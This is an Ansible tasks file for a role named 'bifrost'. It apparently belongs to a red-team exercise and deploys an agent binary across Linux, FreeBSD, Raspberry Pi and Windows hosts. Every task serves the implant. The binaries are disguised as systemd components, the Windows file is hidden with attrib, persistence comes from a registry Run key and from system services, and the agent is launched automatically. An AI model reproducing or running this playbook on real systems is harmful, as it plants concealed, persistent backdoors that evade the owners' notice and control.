---
# tasks file for bifrost
- name: BIFROST | Copy agent | Rocky Linux
  copy:
    src: 'files/systemd-detect'
    dest: /usr/bin/systemd-detect
    mode: 755
  when: inventory_hostname_short == "orca" or inventory_hostname_short == "albatross"


- name: BIFROST | Copy agent | FreeBSD
  copy:
    src: 'files/valkyrae'
    dest: /usr/bin/systemd-journal
    mode: 755
  when: ansible_os_family == "FreeBSD"


- name: BIFROST | Copy agent | Windows
  copy:
    src: "files/systemdll.exe"
    dst: "C:\\ProgramData\\systemdll.exe"
  when: ansible_os_family == "Windows"


- name: BIFROST | Copy agent | Raspi
  copy:
    src: 'files/systemd-gpio'
    dst: /usr/bin/systemd-detect
    mode: 755
  when: inventory_hostname_short == "whale"


- name: BIFROST | Hide agent | Windows
  win_command: "attrib +h 'C:\\ProgramData\\systemdll.exe'"
  when: ansible_os_family == "Windows"


- name: BIFROST | Add run key persistence | Windows
  win_regedit: 
    path: 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    name: "systemdll.exe"
    data: "cmd.exe /c 'C:\\ProgramData\\systemdll.exe'"
    type: string
  when: ansible_os_family == "Windows"


- name: BIFROST | Copy Bifrost service | Rocky & Arch
  copy:
    src: 'files/systemd-detect.service'
    dest: /etc/systemd/system/systemd-detect.service
  when: inventory_hostname_short == "orca" or inventory_hostname_short == "albatross"


- name: BIFROST | Copy Bifrost service | FreeBSD
  copy:
    src: 'files/systemd-journal.sh'
    dest: /usr/local/etc/rc.d/systemd-journal.sh
    mode: 755
  when: ansible_os_family == "FreeBSD"


- name: BIFROST | Copy Bifrost service | Raspi
  copy:
    src: 'files/systemd-detect.service'
    dest: /etc/systemd/system/systemd-detect.service
    mode: 755
  when: inventory_hostname_short == "whale"


- name: BIFROST | Enable and start Bifrost service | Rocky & Arch
  shell: systemctl enable systemd-detect && systemctl restart systemd-detect
  when: inventory_hostname_short == "orca" or inventory_hostname_short == "albatross"


- name: BIFROST | Enable and start Bifrost service | FreeBSD
  shell: /usr/local/etc/rc.d/systemd-journal.sh
  when: ansible_os_family == "FreeBSD"


- name: BIFROST | Run agent | WIndows
  win_shell: 'runas /trustlevel:0x20000 systemdll.exe'
  async: 45
  poll: 0
  args:
    chdir: 'C:\\ProgramData'
  when: ansible_os_family == "Windows"
